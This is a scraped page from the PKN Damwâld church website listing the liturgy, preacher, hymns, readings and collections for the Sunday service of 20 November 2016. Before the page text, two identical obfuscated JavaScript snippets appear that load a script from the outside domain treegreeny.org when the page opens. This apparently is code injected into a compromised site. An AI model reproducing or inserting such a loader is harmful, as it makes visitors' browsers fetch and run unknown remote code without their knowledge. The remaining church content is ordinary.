;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 20 november 2016 9:30 uur - PKN Damwâld
zondag 20 november 2016
09:30 uur

Kerkdienst zondag 20 november 2016 9:30 uur

Thema: Laatste zondag kerkelijk jaar

vg_-01

Informatie

Voorganger:Ds. G. Timmer
Organist:Ivo van Hijum
Thema:Laatste zondag kerkelijk jaar
Liturgie
We zingen: Gezang 1 : 1, 2, 3 en 4
Welkom en mededelingen
We zingen: Psalm 105; 1, 2 en 3
Stil gebed, bemoediging en groet
We zingen: Gezang 294: 1, 2, 3 en 4
Verootmoediging en gebed
We zingen: Gezang 294: 5, 6, 7 en 8
Herdenking overleden gemeenteleden .
Apostolische Geloofsbelijdenis
We zingen: ELB 125: 1, 2 en 3 + refrein
We lezen: Genesis 50: 15-26
We zingen: Gezang 305: 1 en 2
Verkondiging: “Laatste rustplaats”
We zingen: Psalm 43: 3, 4 en 5
Dankgebed en voorbeden Stil gebed , Onze Vader
Collecte
We zingen: ELB 223: 1 en 4
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: St. Beautiful Gate

Stichting Beautiful Gate Nederland ondersteunt een aantal organisaties en projecten, die in Afrika zich inzetten voor kansarme kinderen en gezinnen. De nadruk van deze organisaties ligt op het gebied van het verbeteren van levensomstandigheden voor kansarme kinderen, het versterken van de draagkracht van gezinnen en het geven van informatie aan jong en oud. Momenteel ontvangt een viertal organisaties in Zuid-Afrika, Lesotho en Zambia steun van deze Stichting. Beautiful Gate (ook wel Schone Poort) is in 1994 opgezet door Toby en Aukje Brouwer. Zij zijn toen met hun gezin vanuit Nederland naar Kaapstad vertrokken.

Tweede collecte: Kerk
Uitganscollecte: Bouwfonds